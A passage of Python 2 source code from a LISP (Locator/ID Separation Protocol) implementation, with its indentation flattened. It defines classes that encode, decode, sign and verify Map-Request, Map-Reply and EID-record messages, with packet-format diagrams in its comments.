# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
